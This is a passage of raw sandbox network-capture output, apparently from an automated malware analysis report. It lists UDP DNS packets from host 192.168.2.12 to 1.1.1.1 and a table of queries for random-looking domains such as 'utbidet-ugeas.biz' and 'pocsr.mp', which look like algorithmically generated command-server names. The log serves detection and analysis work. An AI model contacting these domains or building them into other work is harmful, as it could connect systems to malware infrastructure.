                                                                                                                                                                    Sep 7, 2024 15:37:41.381942987 CEST6131253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:41.415365934 CEST53613121.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.415390968 CEST53613121.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.431564093 CEST5108053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:41.441606998 CEST53510801.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.448874950 CEST6460453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:41.458508015 CEST53646041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.478822947 CEST5076253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:41.491008043 CEST53507621.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.524967909 CEST5734153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:41.535047054 CEST53573411.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.557112932 CEST6115653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:41.792042971 CEST53611561.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.806370974 CEST5431553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:41.970542908 CEST53543151.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.993746042 CEST5252053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:42.005450010 CEST53525201.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.025233030 CEST5073853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:42.195008039 CEST53507381.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.212790966 CEST5317253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:42.273335934 CEST53531721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.290607929 CEST5775653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:42.542397022 CEST5775653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:42.564814091 CEST53577561.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.564830065 CEST53577561.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.589649916 CEST6406753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:42.763710976 CEST53640671.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.790664911 CEST6162253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:42.799566031 CEST53616221.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.822679043 CEST5061353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:42.838073015 CEST53506131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.868737936 CEST5403153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:42.904306889 CEST53540311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.931942940 CEST6142853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:43.114084005 CEST53614281.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:43.134392977 CEST6460753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:43.408848047 CEST6460753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:43.697998047 CEST53646071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:43.698018074 CEST53646071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:43.712677956 CEST6020253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:43.887451887 CEST53602021.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:43.918175936 CEST6045053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:43.928744078 CEST53604501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:43.947055101 CEST5245453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:44.196561098 CEST5245453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:44.671228886 CEST53524541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:44.674001932 CEST53524541.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:44.696928024 CEST5881153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:44.706054926 CEST53588111.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:44.728240967 CEST5179953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:44.737150908 CEST53517991.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:44.759340048 CEST6092953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.024543047 CEST6092953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.025804996 CEST53609291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.031445026 CEST53609291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.040726900 CEST6116053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.205249071 CEST53611601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.228821993 CEST5395753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.331078053 CEST53539571.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.353199005 CEST5431753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.604944944 CEST53543171.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.619003057 CEST5302353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.788012028 CEST53530231.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.806708097 CEST5977353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.815674067 CEST53597731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.823898077 CEST4987353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.833098888 CEST53498731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.853333950 CEST5778953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.954536915 CEST53577891.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.978446007 CEST6357053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:45.995031118 CEST53635701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.009324074 CEST5304653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:46.259011984 CEST5304653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:46.503823042 CEST53530461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.503842115 CEST53530461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.525270939 CEST6476953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:46.544306040 CEST53647691.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.571911097 CEST5265053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:46.603164911 CEST53526501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.618782997 CEST5602153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:46.883940935 CEST5602153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:46.893848896 CEST53560211.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.893882990 CEST53560211.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.915595055 CEST5157953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:46.928205013 CEST53515791.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.946763992 CEST6174053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.107157946 CEST53617401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.134356976 CEST5998653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.304338932 CEST53599861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.322073936 CEST6298653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.593168020 CEST53629861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.594590902 CEST6298653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.601754904 CEST53629861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.630119085 CEST4936353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.642190933 CEST53493631.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.669683933 CEST5095153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.678208113 CEST53509511.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.712507010 CEST6063153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.722135067 CEST53606311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.743748903 CEST5206653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.763207912 CEST53520661.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.791215897 CEST5284953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.892256975 CEST53528491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.915704966 CEST5645353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.924622059 CEST53564531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.972986937 CEST5702353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:47.992178917 CEST53570231.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.025372028 CEST5114053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:48.155416965 CEST53511401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.181451082 CEST5657053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:48.192655087 CEST53565701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.214719057 CEST5022953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:48.234925032 CEST53502291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.259454966 CEST6246553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:48.268289089 CEST53624651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.290601969 CEST6099753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:48.331717968 CEST53609971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.368717909 CEST6073653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:48.618346930 CEST6073653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:49.043157101 CEST53607361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.043170929 CEST53607361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.056277037 CEST6493053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:49.103404045 CEST53649301.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.118752003 CEST5329753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:49.368491888 CEST5329753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:49.612859011 CEST53532971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.612875938 CEST53532971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.640431881 CEST5980053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:49.649534941 CEST53598001.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.681945086 CEST5648553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:49.786195040 CEST53564851.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.806188107 CEST5074753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:49.815072060 CEST53507471.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.837430000 CEST6547153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:50.033224106 CEST53654711.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.069180965 CEST5349953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:50.118221998 CEST53534991.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.136181116 CEST4967353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:50.303991079 CEST53496731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.322451115 CEST6504053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:50.333534956 CEST53650401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.353065968 CEST5177753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:50.598956108 CEST53517771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.618832111 CEST5799353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:50.645432949 CEST53579931.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.652064085 CEST5781153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:50.659008026 CEST53578111.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.681632042 CEST5860253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:50.923358917 CEST53586021.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.946917057 CEST5671353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.049547911 CEST53567131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.075203896 CEST5510053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.235255957 CEST53551001.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.259867907 CEST5710753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.269202948 CEST53571071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.292584896 CEST6149353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.389585018 CEST53614931.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.416774035 CEST6483653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.436683893 CEST53648361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.462426901 CEST6386353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.507528067 CEST53638631.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.525046110 CEST6025953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.540878057 CEST53602591.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.571844101 CEST5001253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.603228092 CEST53500121.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.618866920 CEST6083653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.649473906 CEST53608361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.681353092 CEST5783853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.690310001 CEST53578381.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.712825060 CEST5351353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.722773075 CEST53535131.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.746073961 CEST5667853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.755759954 CEST53566781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.791202068 CEST5934153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.826483011 CEST53593411.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.837486982 CEST6350253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.856911898 CEST53635021.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.884479046 CEST5375753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:51.907726049 CEST53537571.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.931534052 CEST6549753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.068418980 CEST53654971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.087769985 CEST5169553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.337178946 CEST5169553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.364965916 CEST53516951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.364985943 CEST53516951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.384419918 CEST6313253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.574748039 CEST53631321.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.605257034 CEST6304053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.614604950 CEST53630401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.636116028 CEST6149853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.649607897 CEST53614981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.681905985 CEST6330653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.690912962 CEST53633061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.712985039 CEST5921453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.739537954 CEST53592141.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.759244919 CEST5127853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.791610956 CEST53512781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.822206974 CEST5296753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.879059076 CEST53529671.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.901393890 CEST5040453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.923728943 CEST53504041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.947036028 CEST6019553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:52.984236002 CEST53601951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:53.009265900 CEST5794153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:53.172679901 CEST53579411.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:53.196887970 CEST6117053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:53.375041962 CEST53611701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:53.400304079 CEST5720153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:53.416884899 CEST53572011.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:53.431284904 CEST6448653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:53.696510077 CEST6448653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:53.774784088 CEST53644861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:53.774801016 CEST53644861.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:53.790693998 CEST6185553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:53.955857038 CEST53618551.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:53.981915951 CEST5016053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:54.001894951 CEST53501601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:54.025568008 CEST5273253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:54.274583101 CEST5273253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:54.303370953 CEST53527321.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:54.303389072 CEST53527321.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:54.328089952 CEST5363753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:54.495127916 CEST53536371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:54.673346996 CEST6457053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:54.872960091 CEST53645701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:54.919631958 CEST6094353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:55.128019094 CEST53609431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.151614904 CEST6383153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:55.183259010 CEST53638311.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.220546961 CEST5577253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:55.316165924 CEST53557721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.338476896 CEST5680853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:55.354604006 CEST53568081.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.386401892 CEST5809653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:55.575136900 CEST53580961.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.769865036 CEST5735253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:55.802342892 CEST53573521.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.859446049 CEST6176453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:55.867389917 CEST53617641.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.897077084 CEST5210353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:55.932298899 CEST53521031.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.947549105 CEST6359553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:56.108161926 CEST53635951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:56.134373903 CEST5372453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:56.393277884 CEST53537241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:56.415785074 CEST5562753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:56.435609102 CEST53556271.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:56.462469101 CEST5964953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:56.727675915 CEST5964953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:56.827258110 CEST53596491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:56.827275038 CEST53596491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:56.837438107 CEST5163553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:57.087258101 CEST5163553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:37:57.331677914 CEST53516351.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:57.331696033 CEST53516351.1.1.1192.168.2.12
                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Sep 7, 2024 15:33:53.579710007 CEST192.168.2.121.1.1.10x9109Standard query (0)uszzu.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:54.384427071 CEST192.168.2.121.1.1.10xab2aStandard query (0)gcwsiuav.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:54.525239944 CEST192.168.2.121.1.1.10x1585Standard query (0)oiyjuwpfrwm.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:54.822097063 CEST192.168.2.121.1.1.10x8523Standard query (0)iycisbygfyc.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:55.087666988 CEST192.168.2.121.1.1.10x5b73Standard query (0)qidxlsmgykakg.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:55.244141102 CEST192.168.2.121.1.1.10x179bStandard query (0)aooxybqcnmauq.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:55.266999006 CEST192.168.2.121.1.1.10x3f96Standard query (0)utbidet-ugeas.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:56.259012938 CEST192.168.2.121.1.1.10x3f96Standard query (0)utbidet-ugeas.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:57.634665966 CEST192.168.2.121.1.1.10x685dStandard query (0)jmkxaicazxych.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:58.259561062 CEST192.168.2.121.1.1.10x5dc8Standard query (0)mcawgzcua.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:58.478267908 CEST192.168.2.121.1.1.10x8d19Standard query (0)yejcjzwctwukz.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:59.119075060 CEST192.168.2.121.1.1.10x4b80Standard query (0)usgghqqwe.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:59.243829012 CEST192.168.2.121.1.1.10x26eaStandard query (0)cgpnsdg.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:59.603308916 CEST192.168.2.121.1.1.10xba65Standard query (0)yjzdwbmrwqqceb.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:33:59.743859053 CEST192.168.2.121.1.1.10xf2deStandard query (0)hrgovxgunqipw.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:00.400078058 CEST192.168.2.121.1.1.10x8e62Standard query (0)azygvwdgtdv.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:00.556747913 CEST192.168.2.121.1.1.10x728cStandard query (0)feiqcfkbsuoje.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:01.212735891 CEST192.168.2.121.1.1.10xcde8Standard query (0)icuryqispglav.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:01.337610006 CEST192.168.2.121.1.1.10xcbeaStandard query (0)veymtqimby.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:01.462591887 CEST192.168.2.121.1.1.10x5969Standard query (0)vhpidswja.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:01.588553905 CEST192.168.2.121.1.1.10x50ffStandard query (0)bvqeqascgtwoe.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:02.525135040 CEST192.168.2.121.1.1.10x6a60Standard query (0)pocsr.mpA (IP address)IN (0x0001)false
